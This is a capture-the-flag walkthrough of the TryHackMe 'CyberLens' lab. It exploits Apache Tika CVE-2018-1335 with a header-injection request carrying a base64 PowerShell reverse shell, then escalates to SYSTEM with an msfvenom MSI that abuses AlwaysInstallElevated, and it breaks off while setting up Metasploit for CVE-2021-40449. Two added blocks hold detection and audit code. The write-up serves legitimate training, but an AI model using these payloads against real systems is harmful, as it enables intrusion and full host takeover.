
# CyberLens

{% embed url="<https://tryhackme.com/r/room/cyberlensp6>" %}
Room Link
{% endembed %}

This work by Manav G Krishna is licensed under [CC BY-NC 4.0](http://creativecommons.org/licenses/by-nc/4.0/?ref=chooser-v1) <img src="/files/fgutP6VmsOsVHYVe8Cfh" alt="" data-size="line"><img src="/files/J1FStDkVaABJlaGdbdeX" alt="" data-size="line">

**`Machine IP`**: 10.10.131.149

**`Nmap Scan`**:

```text
nmap -p- -v 10.10.131.149 --min-rate 100 -oN cyberlens_thm -Pn 

Nmap scan report for cyberlens.thm (10.10.131.149)
Host is up (0.15s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-18T05:18:41+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Issuer: commonName=CyberLens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-17T05:04:27
| Not valid after:  2024-11-16T05:04:27
| MD5:   0a8f:0621:514f:c425:d6c1:c704:82bf:3dbb
|_SHA-1: 9cc8:94c9:73db:50dc:215f:e168:4e54:f1d9:9554:9106
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-18T05:18:33+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|   Supported Methods: POST GET PUT OPTIONS HEAD
|_  Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/18%OT=80%CT=1%CU=30699%PV=Y%DS=2%DC=T%G=Y%TM=6648
OS:3A2F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=104%GCD=1%ISR=105%TI=I%CI=I%TS=U)SEQ(SP=104%GCD=1%ISR=105%TI
OS:=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=2%ISR=106%TI=I%CI=I%II=I%SS=S%TS=U
OS:)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%
OS:O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%D
OS:F=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-05-18T05:18:36
|_  start_date: N/A

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   148.60 ms 10.11.0.1
2   149.53 ms cyberlens.thm (10.10.131.149)

```

Let us add **`cyberlens.thm`** to the **`hosts`** file as mentioned in the description of the room.

**`Command`**:

```bash
# "sudo echo ... >> /etc/hosts" fails with "Permission denied": the redirect is done by
# the unprivileged shell, not by sudo. Let a privileged tee do the append instead.
echo '10.10.131.149 cyberlens.thm' | sudo tee -a /etc/hosts
```

Instead of waiting for the scan to complete fully, we can navigate to the website on port **`80`**. As the **`verbose`** switch is being used in the **`Nmap`** command, we see each open port as soon as it is found.

**`Checking out Port 80`**:

<figure><img src="/files/iuamL6cSRL7asERe8agt" alt=""><figcaption></figcaption></figure>

We can see what **`Wappalyzer`** tells us:

<div align="left"><figure><img src="/files/EcyBIrVqTL5XCtMBENW3" alt=""><figcaption></figcaption></figure></div>

The web server running is **`Apache 2.4.57`**.

We have a **`contact form`** here:

<figure><img src="/files/I4g2S4zSOgIEiuNTnaOR" alt=""><figcaption></figcaption></figure>

**`Testing out a basic XSS Payload`**:

<figure><img src="/files/Yt5k0x0DkCpiAJx9RkQB" alt=""><figcaption></figcaption></figure>

Now let's set up a **`netcat`** listener on port **`80`**. If the above payload works we should be getting a connection back on our listener which basically shows that the server has reached out to our machine. The **`IP`** specified in the payload is the **`tun0`** interface **`IP`**.

<div align="left"><figure><img src="/files/JdZ7x6nxCVAYXca0rnad" alt=""><figcaption></figcaption></figure></div>

But unfortunately we don't get any connection on the listener.

Nothing out of the ordinary was found while **`directory busting`**, and **`VHOST busting`** yielded no results either.

There is a feature on the site called, **`CyberLens Image Extractor`** :

<figure><img src="/files/26PADThWvLVIJxNNPAbx" alt=""><figcaption></figcaption></figure>

Basically we can **`upload`** files and the feature fetches the **`metadata`** present within those files. Metadata is the **`hidden data`** that accompanies every image, video, and file you encounter.

**`Checking out this feature by intercepting the request in BurpSuite`**:

After turning on the intercept in **`Burp`** we just have to upload a file and click on the **`Get Metadata`** button and the request will get captured in **`Burp`**:

<div align="left"><figure><img src="/files/wGckQgYqv6xyBTHq8fx9" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/wBHvLN7qXe23al3GqfBK" alt=""><figcaption></figcaption></figure></div>

**`Forward`** the above request and we will be on the one that we need:

<figure><img src="/files/4SseitZv1QfgjmkXpfky" alt=""><figcaption></figcaption></figure>

This shows that the **`metadata extraction`** takes place on port **`61777`**. We can now check out the **`Nmap`** scan, which would have completed fully by now, and can also check out the website on that port:

<div align="left"><figure><img src="/files/fCIItTKk3eQISKxfMpmn" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/mKnayk8fV2rYu6KyxUUX" alt=""><figcaption></figcaption></figure></div>

We can see that it is using **`Apache Tika 1.17`**. It is an open-source software library that detects and **`extracts metadata`** and **`structured text`** from a **`variety`** of file formats. This is what is being used to fetch the **`metadata`** from the files that we upload in the **`CyberLens Image Extractor`** feature.

We can confirm this by looking at the **`metadata`** it extracts, mainly the **`Parsing headers`**; a PDF file has been uploaded this time:

<div align="left"><figure><img src="/files/BR3kfvxVxs2DCJC5fBEg" alt=""><figcaption></figcaption></figure></div>

The endpoint seen in the request is **`/meta`**; this is where the request made on clicking **`Get Metadata`** is sent, and the data is **`PUT`** to the server:

<div align="left"><figure><img src="/files/FhNP94rn8y2wzrXNQXyl" alt=""><figcaption></figcaption></figure></div>

Now that we know exactly what is happening, we can search for exploits for **`Apache Tika 1.17`**, which leads us to **`CVE-2018-1335`**.

**`CVE-2018-1335 - Command Injection in Apache Tika`**:

{% embed url="<https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/>" %}
CVE-2018-1335
{% endembed %}

**`Note`**:

I will be showing **`3`** ways to get the **`foothold`** by exploiting the above mentioned **`CVE`**. The first is doing it **`manually`**, the second is via the **`POC (python script)`** and the final one is via **`Metasploit`**.

**`Manual Exploitation to get a Reverse Shell`**:

Towards the end of the above attached blog, we find this:

<figure><img src="/files/JhiHrXsrsK7aO5JzabUX" alt=""><figcaption></figcaption></figure>

Based on this, we have to include a few extra **`headers`**, change the content-type and also add the **`JS`** code in the body of the request.

```javascript
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');
```

What these two **`JS`** lines do: the first creates a **`WScript.Shell object`**, which provides access to **`Windows shell`** functionality (**`WScript`** is the Windows Script Host, which interprets and executes scripts written in languages such as **`VBScript`** and **`JScript`**); the second uses this object to run the command **`cmd /c calc.exe`**, which opens **`Calculator`** on the target machine.

The command can be modified by us to get a **`reverse shell`** instead.

**`Base64 Encoded PS Reverse Shell`**:

{% embed url="<https://www.revshells.com/>" %}

<figure><img src="/files/kR3qAfOOjdj8xQ6pNIOV" alt=""><figcaption></figcaption></figure>

Setting up a listener on port **`445`**:

<div align="left"><figure><img src="/files/I0BrmTrH2enoJyCsmov5" alt=""><figcaption></figcaption></figure></div>

**`Final Request`**:

The extra **`headers`** include:

```http
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
```

And also the **`Content-Type`** has to be changed to **`image/jp2`**.

The request **`body`**:

```javascript
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');
```

```http
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Content-Type: image/jp2
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript

var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e 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');
```
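Added detection-side example (my own code, not part of this writeup and not Apache Tika's): a small parser for raw HTTP request text plus a rule that flags the request shape shown above, so the pattern can be spotted in a proxy or WAF log placed in front of a Tika server. The two sample requests are constructed; the heuristic that an `X-Tika-OCRLanguage` value beginning with a slash is suspicious is this example's own (genuine Tesseract language codes look like `eng` or `eng+fra`).

```python
"""Flag requests to a Tika server that match the CVE-2018-1335 abuse pattern.

Added example, not code from the original writeup or from Apache Tika.
The sample requests below are constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # header names are lower-cased
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.1 request (CRLF or LF line endings) into its parts."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


# Windows Script Host calls that have no business inside an "image" upload.
SCRIPT_BODY = re.compile(r"WScript\.(CreateObject|Shell)|\.Exec\(", re.IGNORECASE)


def tika_findings(req: HttpRequest) -> list:
    """Return the reasons (possibly none) a Tika request looks like CVE-2018-1335 abuse."""
    findings = []
    # 1. A client must never be allowed to point Tika at a different OCR binary.
    if "x-tika-ocrtesseractpath" in req.headers:
        findings.append("tesseract-path-override")
    # 2. Language codes look like "eng"; a leading slash means the value is being
    #    consumed as a command-line switch (heuristic chosen for this example).
    if req.headers.get("x-tika-ocrlanguage", "").startswith("/"):
        findings.append("ocr-language-looks-like-command-switch")
    # 3. Script text under an image content type is a strong signal on its own.
    if req.headers.get("content-type", "").startswith("image/") and SCRIPT_BODY.search(req.body):
        findings.append("script-body-under-image-content-type")
    return findings


# Constructed sample: a normal metadata lookup of a JPEG (body stands in for JPEG bytes).
BENIGN_REQUEST = (
    "PUT /meta HTTP/1.1\r\n"
    "Host: cyberlens.thm:61777\r\n"
    "Content-Type: image/jpeg\r\n"
    "Accept: application/json\r\n"
    "\r\n"
    "<constructed JPEG bytes>\r\n"
)

# Constructed sample mirroring the request shape shown in the writeup.
SUSPICIOUS_REQUEST = (
    "PUT /meta HTTP/1.1\r\n"
    "Host: cyberlens.thm:61777\r\n"
    "Content-Type: image/jp2\r\n"
    'X-Tika-OCRTesseractPath: "cscript"\r\n'
    "X-Tika-OCRLanguage: //E:Jscript\r\n"
    "\r\n"
    'var oShell = WScript.CreateObject("WScript.Shell");\r\n'
    "var oExec = oShell.Exec('cmd /c calc.exe');\r\n"
)


def scan(raw_requests) -> list:
    """Return (index, findings) for every request in the batch that was flagged."""
    flagged = []
    for index, raw in enumerate(raw_requests):
        findings = tika_findings(parse_request(raw))
        if findings:
            flagged.append((index, findings))
    return flagged


if __name__ == "__main__":
    for index, why in scan([BENIGN_REQUEST, SUSPICIOUS_REQUEST]):
        print(f"request #{index} flagged: {', '.join(why)}")
```

Flagging these headers at the edge is a stop-gap; the actual fix is running a Tika version newer than 1.17 and not exposing `tika-server` beyond the host that needs it, since the `X-Tika-*` headers were never meant to be client-controllable on an untrusted network.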

<figure><img src="/files/aD6TwXCmxU7O4sD1a0Lt" alt=""><figcaption></figcaption></figure>

The same can be done through **`curl`** too:

**`Command`**:

```bash
curl -X PUT http://cyberlens.thm:61777/meta \
     -H "Content-Type: image/jp2" \
     -H 'X-Tika-OCRTesseractPath: "cscript"' \
     -H 'X-Tika-OCRLanguage: //E:Jscript' \
     --data '
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('\''cmd /c powershell -e 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'\'');
'
```

We just send the request and we can check out the listener:

<div align="left"><figure><img src="/files/LaOOEyAfRiWsd0HvkPit" alt=""><figcaption></figcaption></figure></div>

Now we have successfully got a shell as the user **`cyberlens`** and we can get the user flag in this user's **`Desktop`** folder.

**`Using POC to get a Reverse Shell`**:

{% embed url="<https://github.com/RhinoSecurityLabs/CVEs/blob/master/CVE-2018-1335/CVE-2018-1335.py>" %}

<div align="left"><figure><img src="/files/rvITgafKr5punE6hrPWu" alt=""><figcaption></figcaption></figure></div>

**`Command`**:

```bash
python3 exploit.py cyberlens.thm 61777 'cmd /c powershell -e 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'
```

The **`Base64 Encoded PS Payload`** is what is being used here too.

We have now got the shell:

<div align="left"><figure><img src="/files/IMi75JGFaNDosObevLNU" alt=""><figcaption></figcaption></figure></div>

**`Using Metasploit`**:

**`Command`**:

```bash
msfconsole -q   # -q starts Metasploit in quiet mode, i.e. without printing the banner
```

<figure><img src="/files/AOMMO3IbEL5UrcvT1nGD" alt=""><figcaption></figcaption></figure>

Setting the **`options`**:

Running **`systeminfo`** in the shell obtained through any of the above mentioned ways gives us the system type:

**`Command`**:

```powershell
systeminfo | findstr /B /C:"System Type"
```

<div align="left"><figure><img src="/files/cUbcPPxpP7KmgJuHM04g" alt=""><figcaption></figcaption></figure></div>

It is a **`64-bit`** machine. So while setting the payload option we would have to set a **`64-bit`** payload.

<figure><img src="/files/OBxnKBRp8PAuSUvRIKfa" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/jSHCTokS0L4E99t9YnBQ" alt=""><figcaption></figcaption></figure>

Now we just **`run`** the exploit:

<figure><img src="/files/2GTsUgen2i5DN15JG8fG" alt=""><figcaption></figcaption></figure>

Yet again, we have a shell.

Let us see if we can do some **`enumeration`** and find out whether **`passwords`** of any users are stored in **`files`**, which is a pretty common finding in **`real world pentests`** too. Let us check a few **`common`** file types that passwords could be stored in, such as **`.txt`**, **`.xml`**, **`.ini`** etc.

We can firstly look within **`CyberLens's home`** folder.

**`Command`**:

```powershell
Get-ChildItem -Path . -Recurse -Include *.txt,*.xml,*.ini
```

<figure><img src="/files/yYVmwxl0w2OwpMrkhRuE" alt=""><figcaption></figcaption></figure>

There is a file called **`CyberLens-Management.txt`**.

Let us check it out:

<figure><img src="/files/VMev3JDMt1ReJcdzmwDj" alt=""><figcaption></figcaption></figure>

And indeed we find **`CyberLens's`** password.

Also, the **`Nmap`** scan shows us that port **`3389`** is open. Let us confirm if we can **`RDP`** in as **`CyberLens`**:

**`Command`**:

```bash
netexec rdp cyberlens.thm -u CyberLens -p 'insert_password'
```

<figure><img src="/files/hbIgwBOXwY5jkgHWQj3F" alt=""><figcaption></figcaption></figure>

**`NetExec`** says **`Pwn3d!`**. This means the creds are **`valid`** and we can **`RDP`** in.

**`Note`**:

**`RDP`**ing in is **`not needed`** considering we already have a **`shell`** as **`CyberLens`**. Below are the steps to follow if you want to try it out.

**`Command`**:

```bash
xfreerdp /u:CyberLens /p:'insert_password' /v:cyberlens.thm /dynamic-resolution
```

<figure><img src="/files/tKkXU2ZNsE31m1Jl2V52" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/qINHmXwBLoG5ifZjlfVI" alt=""><figcaption></figcaption></figure>

We have got in.

**`Privilege Escalation to SYSTEM (Intended Way)`**:

We can firstly check if **`Windows Defender`** is running or not:

**`Command`**:

```powershell
sc.exe query WinDefend
```

<div align="left"><figure><img src="/files/hz2y85jgd4RIR1ejQSKD" alt=""><figcaption></figcaption></figure></div>

We can see that the **`STATE`** is **`STOPPED`**, which means **`Defender`** is **`not`** running.

Now let us run **`WinPEAS`** on the machine by serving it via a **`python server`**; the **`64-bit WinPEAS`** build is what we need as the target system is **`64-bit`**.

We can write to the **`home`** folder or **`Desktop`** folder of the user **`CyberLens`** as we have **`Full Control (F)`** in these locations:

<div align="left"><figure><img src="/files/ad7mA3vssdbjjpqljFov" alt=""><figcaption></figcaption></figure></div>

**`Command`**:

```powershell
IWR -Uri http://10.11.75.84:4545/winPEASx64.exe -OutFile winPEASx64.exe
```

<figure><img src="/files/bMRmgcVFRtA8cLF57WO7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/GJeN9RskyXCzpvzKi1vR" alt=""><figcaption></figcaption></figure>

**`Running WinPEAS`**:

<figure><img src="/files/xMIgXn0dKfXRD0p5A3uG" alt=""><figcaption></figcaption></figure>

We then come across this:

<figure><img src="/files/J8qgqUq8X1vZRTpZA3A0" alt=""><figcaption></figcaption></figure>

We can see that the **`AlwaysInstallElevated Policy`** is set to **`1 (Enabled)`** for both **`HKLM (HKEY_LOCAL_MACHINE)`** & **`HKCU (HKEY_CURRENT_USER)`** registry hives. This policy allows **`non-administrative users`** to **`install`** software with **`elevated privileges`**. In this case it is enabled globally (for all users) as well as for the current user on the system.

This policy allows a **`regular user`** to install **`MSI`** files with **`high/elevated`** privileges.

**`Manually`** enumerating the status of **`AlwaysInstallElevated`**:

**`Commands`**:

```powershell
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

<figure><img src="/files/bwcetk0zUrRPjOnE5bMh" alt=""><figcaption></figcaption></figure>
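Added example (my own code, not part of the writeup): a Python audit helper that parses the output of the two `reg query` commands above and reports whether the policy is actually in force. Windows Installer only elevates when the value is `1` in both hives, so a single hive is reported as a hardening note but not as an effective policy; the sample outputs are constructed, and `remediation_commands` emits the `reg add` lines that clear the setting on each hive where it is enabled.

```python
"""Audit AlwaysInstallElevated from 'reg query' output.

Added example, not part of the original writeup. Windows Installer only honours
the policy when the value is 1 under both HKLM and HKCU, so a single hive is
reported but not counted as effective. Sample outputs below are constructed.
"""
import re

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_RE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)")


def parse_reg_query(output: str):
    """Return the DWORD as an int, or None when the key or value does not exist."""
    match = VALUE_RE.search(output)
    return int(match.group(1), 16) if match else None


def audit(hkcu_output: str, hklm_output: str) -> dict:
    """Combine the per-hive results into one verdict."""
    hkcu = parse_reg_query(hkcu_output)
    hklm = parse_reg_query(hklm_output)
    return {
        "HKCU": hkcu,
        "HKLM": hklm,
        # Elevated installs need both hives set to 1; anything else is a note only.
        "effective": hkcu == 1 and hklm == 1,
    }


def remediation_commands(state: dict) -> list:
    """'reg add' lines that set each enabled hive back to 0 (non-elevated installs)."""
    cmds = []
    for hive in ("HKLM", "HKCU"):
        if state.get(hive) == 1:
            cmds.append(
                f"reg add {hive}\\{INSTALLER_KEY} /v AlwaysInstallElevated /t REG_DWORD /d 0 /f"
            )
    return cmds


# Constructed sample outputs in the format 'reg query' prints.
HKCU_ENABLED = (
    "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKLM_ENABLED = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKLM_DISABLED = HKLM_ENABLED.replace("0x1", "0x0")
KEY_MISSING = (
    "\r\nERROR: The system was unable to find the specified registry key or value.\r\n"
)


if __name__ == "__main__":
    for label, hkcu, hklm in [
        ("both enabled", HKCU_ENABLED, HKLM_ENABLED),
        ("HKCU only", HKCU_ENABLED, HKLM_DISABLED),
        ("policy absent", KEY_MISSING, KEY_MISSING),
    ]:
        state = audit(hkcu, hklm)
        print(label, "->", state, remediation_commands(state))
```

On a real host you would feed it the captured output of the two `reg query` commands; the "HKCU only" case is included because WinPEAS-style tooling often lists the per-user value on its own, and the audit should make clear that it only matters together with the machine-wide one.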

This can be abused by us in order to **`escalate privileges`** to become **`SYSTEM`** by crafting a **`malicious MSI`** file.

{% embed url="<https://juggernaut-sec.com/alwaysinstallelevated/#Abusing_AlwaysInstallElevated_to_Obtain_a_SYSTEM_Shell>" %}

<figure><img src="/files/cJ1Zj4pwwi2XcuenzGrn" alt=""><figcaption></figcaption></figure>

We can create a **`.msi`** payload using **`msfvenom`** and this can be served via a **`python server`**.

**`Command`**:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=443 -a x64 --platform windows -f msi -o evil.msi
```

<figure><img src="/files/DPIEOMxvyaEK1ywvGxel" alt=""><figcaption></figcaption></figure>

**`Command`**:

```powershell
IWR -Uri http://10.11.75.84:4545/evil.msi -OutFile evil.msi
```

<div align="left"><figure><img src="/files/HyyVHFaYmSsJvpdjbb52" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/l3qqfx8pOMoHfpXltc7q" alt=""><figcaption></figcaption></figure></div>

Now let us setup a listener on port **`443`**:

<div align="left"><figure><img src="/files/Vc3LWJfNsJNBhOGaPafe" alt=""><figcaption></figcaption></figure></div>

Running the **`bad MSI`** file:

**`Command`**:

```powershell
msiexec.exe /i evil.msi
```

<figure><img src="/files/VnyOKgjEvQfv6JmX3iTa" alt=""><figcaption></figcaption></figure>

Now let us check out our listener:

<div align="left"><figure><img src="/files/JjaUfeeUVIEvCO43iiKm" alt=""><figcaption></figcaption></figure></div>

We have successfully got a shell as **`SYSTEM`**. The **`admin flag`** can be found in the **`Desktop`** folder of **`Administrator`**.

The same can be done via **`Metasploit`** too (**`exploit/windows/local/always_install_elevated`**).

**`Privilege Escalation to SYSTEM (Unintended Way)`**:

Let us check out the **`OS Version`** on the machine:

**`Command`**:

```powershell
systeminfo | findstr /B /C:"OS Version"
```

<div align="left"><figure><img src="/files/7Q2fV4G4E8y9ffKFUWmg" alt=""><figcaption></figcaption></figure></div>

It is **`10.0.17763 N/A Build 17763`**. We can now check out exploits for this version.

And we get this in one of the results:

<div align="left"><figure><img src="/files/C3X8P7QmS8PhqbKybmGR" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/MjJ0wUEZG88nsNzdkemr" alt=""><figcaption></figcaption></figure>

It is an **`LPE (Local Privilege Escalation)`** exploit.

**`CVE-2021-40449 (Win32k - LPE)`**:

{% embed url="<https://github.com/ly4k/CallbackHell>" %}
CVE-2021-40449
{% endembed %}

We can check out the repo:

<figure><img src="/files/bRvVcBFWH9aYmgyT03Ia" alt=""><figcaption></figcaption></figure>

We can see that the **`exact version`** that we have on the **`target`** is **`vulnerable`** to this **`LPE`** exploit.

This can be used to get to **`SYSTEM`**.

The repo **`doesn't have`** pre-compiled binaries. The **`.sln`** file has to be compiled to an **`.exe`** file and this can be achieved by using **`Visual Studio`**. There are other ways to do it too, but it is a **`lengthy procedure`**. Instead we can exploit this in an **`easier`** way using **`Metasploit`**.

**`Note`**:

We can use the **`meterpreter shell`** that we got by exploiting the **`Apache Tika CVE`** initially to run the above mentioned **`LPE`** exploit, or we can use the **`web_delivery`** exploit in the shell that we got by **`manually`** exploiting the **`Tika CVE`**. The **`easier`** and more practical way of getting a **`meterpreter`** shell would be through **`web_delivery`**. But in this case, since we have a **`meterpreter`** shell from before, I will be using that as it is a shell obtained in the **`context`** of this machine, and mainly because you have the **`option`** to **`choose`** which way you would like to follow to get to **`SYSTEM`**. Also, for the **`LPE`** exploit, a couple of repos containing the pre-built binary were found but they **`didn't work`**.

**`Getting the shell as CyberLens by exploiting CVE-2018-1335`**:

<figure><img src="/files/YhamOeKGSbK0KwV8pscJ" alt=""><figcaption></figcaption></figure>

**`CVE-2021-40449 Exploitation`**:

<figure><img src="/files/you7XTSDJQwWLgmoFgf5" alt=""><figcaption></figcaption></figure>

The initial **`meterpreter`** shell is **`backgrounded`** (**`bg`**) so that it can be used with the exploit.

<figure><img src="/files/XriWg4vPZYP8l83M6ZKW" alt=""><figcaption></figcaption></figure>

Setting the **`options`**:

We have to firstly set the **`SESSION`**, which is basically the initial shell that we had obtained. This is how the exploit module knows where to perform the **`LPE`** exploit.

<figure><img src="/files/dP8dlci4vlpfulC9Qtur" alt=""><figcaption></figcaption></figure>

**`Note`**:

The **`SESSION`** count is **`3`** for me as this is the **`3rd session`** that I have opened. This **`won't`** be the same in your case; it depends on how many sessions were opened before using the **`Apache Tika Metasploit`** exploit. Make sure to type in the **`meterpreter`** command **`sessions`** to find out your current session **`ID`**.

<div align="left"><figure><img src="/files/W65940RiZ4d43lTxTK0D" alt=""><figcaption></figcaption></figure></div>

We had left the **`LPORT`** at the default setting of port **`4444`** initially while performing the **`Tika`** exploit via **`Metasploit`**. Now we have to use a different **`LPORT`** for the exploit to listen on, so we can set it to **`5555`**.

Now we just **`run`** the exploit:

